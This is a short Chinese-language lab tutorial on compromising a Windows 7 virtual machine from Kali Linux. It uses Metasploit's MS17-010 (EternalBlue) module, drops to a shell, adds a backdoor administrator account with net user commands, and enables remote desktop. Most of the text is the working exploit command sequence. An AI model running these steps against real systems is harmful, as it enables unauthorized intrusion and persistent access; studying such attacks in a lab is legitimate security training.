攻防渗透win7系统教程

1、环境搭建

win10安装vmware软件

新建虚拟机安装windows_7旗舰版（靶机系统，待破解的windows），搭建完成后关闭系统防火墙，配置网络IP地址。

新建虚拟机kali-linux（渗透测试系统环境），配置网络IP地址，两个系统保持一致。

搭建过程略

2、检查kali系统到靶机系统是否通畅。

3、在kali系统中开启msfconsole，Msfconsole是Metasploit框架中的一个交互式命令行工具，用于执行各种渗透测试任务。

4、搜索漏洞使用命令search ms17-010，在Metasploit框架中搜索与MS17-010（永恒之蓝）漏洞相关的模块和工具。

5、使用2号漏洞 use 2 回车

6、瞄准目标，设置目标主机，set rhosts 192.168.187.11(靶机IP地址)。

7、开始共计测试，输入run，后面红框内容说明攻击成功。

8、执行shell，进入靶机DOS，Shell是一种命令行界面，用于用户与操作系统进行交互。

9、显示所有的账户列表，net user

10、添加新用户net user admin 123 /add

11、将admin用户加入到管理员组中，net localgroup administrators admin /add

12、退出靶机，打开靶机的远程桌面功能，run post/windows/manage/enable_rdp

13、使用远程桌面工具连接靶机，连接成功。